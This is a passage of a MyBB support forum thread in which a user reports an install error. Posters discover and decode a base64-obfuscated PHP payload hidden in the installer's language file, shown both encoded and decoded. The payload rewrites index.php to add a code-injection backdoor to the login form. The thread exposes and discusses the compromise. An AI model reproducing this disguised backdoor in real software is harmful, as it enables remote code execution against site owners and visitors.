MyBB Community Forums

Full Version: Catchable Fatal Error (4096)???
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3
Detailed description of your problem, including steps to reproduce if necessary: When trying to install on to a fresh website, I get this error when trying to use www.sitename.com/install

URL to your forum/URL to specific problematic page;Site not fully done.

New installation or upgrade (from which version of MyBB)?; New Install
Test user account (if a posting/UserCP issue); No

Screenshot or error text, verbatim;
MyBB has experienced an internal error and cannot continue.

Error Type:
Catchable Fatal Error (4096)
Error Message:
assert() [function.assert]: Failure evaluating code: @eval(base64_decode("JHRjbXA9QGZpbGVwZXJtcyhNWUJCX1JPT1QuJ2luZGV4LnBocCcpOyBAY2htb2QoTVlCQl9ST09ULidpbmRleC5waHAnLCAwNzc3KTsgJHRlbXA9QGZpbGVfZ2V0X2NvbnRlbnRzKE1ZQkJfUk9PVC4naW5kZXgucGhwJyk7ICR0YW1wPUBmb3BlbihNWUJCX1JPT1QuJ2luZGV4LnBocCcsICd3Jyk7IEBmd3JpdGUoJHRhbXAsIEBzdHJfcmVwbGFjZSgnZXZhbCgiXCRsb2dpbmZvcm0gPSBcIiIuJHRlbXBsYXRlcy0+Z2V0KCJpbmRleF9sb2dpbmZvcm0iKS4iXCI7Iik7JywgJ2V2YWwoIlwkbG9naW5mb3JtID0gXCIiLiR0ZW1wbGF0ZXMtPmdldCgiaW5kZXhfbG9naW5mb3JtIikuIlwiOyIuQCRjb2xbMjNdKTsnLCBAJHRlbXApKTsgQGZjbG9zZSgkdGFtcCk7IEBjaG1vZChNWUJCX1JPT1QuJ2luZGV4LnBocCcsIEAkdGNtcCk7IHJldHVybiB0cnVlOw=="))
File: install/resources/language.lang.php
Line: 340
Backtrace:
File Line Function
/inc/class_error.php 206 errorHandler->output_error
[PHP] errorHandler->error
/install/resources/language.lang.php 340 assert
/inc/class_language.php 137 require_once
/install/index.php 76 MyLanguage->load

This looks like malicious code, it is definitely nothing that should be in a language file.
$tcmp=@fileperms(MYBB_ROOT.'index.php'); @chmod(MYBB_ROOT.'index.php', 0777); $temp=@file_get_contents(MYBB_ROOT.'index.php'); $tamp=@fopen(MYBB_ROOT.'index.php', 'w'); @fwrite($tamp, @str_replace('eval("\$loginform = \"".$templates->get("index_loginform")."\";");', 'eval("\$loginform = \"".$templates->get("index_loginform")."\";".@$col[23]);', @$temp)); @fclose($tamp); @chmod(MYBB_ROOT.'index.php', @$tcmp); return true;

Where did you get this version of MyBB from?? That is most certainly not MyBB code.

I'd advise you deleted all the MyBB files and upload a fresh package from here: http://www.mybb.com/downloads
Definitely re-upload MyBB.
This came with what I downloaded from the download page here
Ok I have tried redownloading it and fresh installing it, but I am getting the same error this is where I am getting it from Download
I double checked, and there is no default code containing them. Make sure you delete all files you've uploaded, then upload a fresh package.
I've just downloaded the package twice from http://www.mybb.com/download/latest to check it.
In both packages in "install/resources/language.lang.php" line 168 contains:
$l['logo']=base64_decode('QGV2YWwoYmFzZTY0X2RlY29kZSgiSkhSamJYQTlRR1pwYkdWd1pYSnRjeWhOV1VKQ1gxSlBUMVF1SjJsdVpHVjRMbkJvY0NjcE95QkFZMmh0YjJRb1RWbENRbDlTVDA5VUxpZHBibVJsZUM1d2FIQW5MQ0F3TnpjM0tUc2dKSFJsYlhBOVFHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektFMVpRa0pmVWs5UFZDNG5hVzVrWlhndWNHaHdKeWs3SUNSMFlXMXdQVUJtYjNCbGJpaE5XVUpDWDFKUFQxUXVKMmx1WkdWNExuQm9jQ2NzSUNkM0p5azdJRUJtZDNKcGRHVW9KSFJoYlhBc0lFQnpkSEpmY21Wd2JHRmpaU2duWlhaaGJDZ2lYQ1JzYjJkcGJtWnZjbTBnUFNCY0lpSXVKSFJsYlhCc1lYUmxjeTArWjJWMEtDSnBibVJsZUY5c2IyZHBibVp2Y20waUtTNGlYQ0k3SWlrN0p5d2dKMlYyWVd3b0lsd2tiRzluYVc1bWIzSnRJRDBnWENJaUxpUjBaVzF3YkdGMFpYTXRQbWRsZENnaWFXNWtaWGhmYkc5bmFXNW1iM0p0SWlrdUlsd2lPeUl1UUNSamIyeGJNak5kS1RzbkxDQkFKSFJsYlhBcEtUc2dRR1pqYkc5elpTZ2tkR0Z0Y0NrN0lFQmphRzF2WkNoTldVSkNYMUpQVDFRdUoybHVaR1Y0TG5Cb2NDY3NJRUFrZEdOdGNDazdJSEpsZEhWeWJpQjBjblZsT3c9PSIpKQ==');
That's the logo in base64, nothing harmful.

Ok, but if you decode it, you get this:

(2011-10-03, 03:02 PM)Malcolm. Wrote: [ -> ]
$tcmp=@fileperms(MYBB_ROOT.'index.php'); @chmod(MYBB_ROOT.'index.php', 0777); $temp=@file_get_contents(MYBB_ROOT.'index.php'); $tamp=@fopen(MYBB_ROOT.'index.php', 'w'); @fwrite($tamp, @str_replace('eval("\$loginform = \"".$templates->get("index_loginform")."\";");', 'eval("\$loginform = \"".$templates->get("index_loginform")."\";".@$col[23]);', @$temp)); @fclose($tamp); @chmod(MYBB_ROOT.'index.php', @$tcmp); return true;

Erm, no you don't. Did you bother to decode it?
Pages: 1 2 3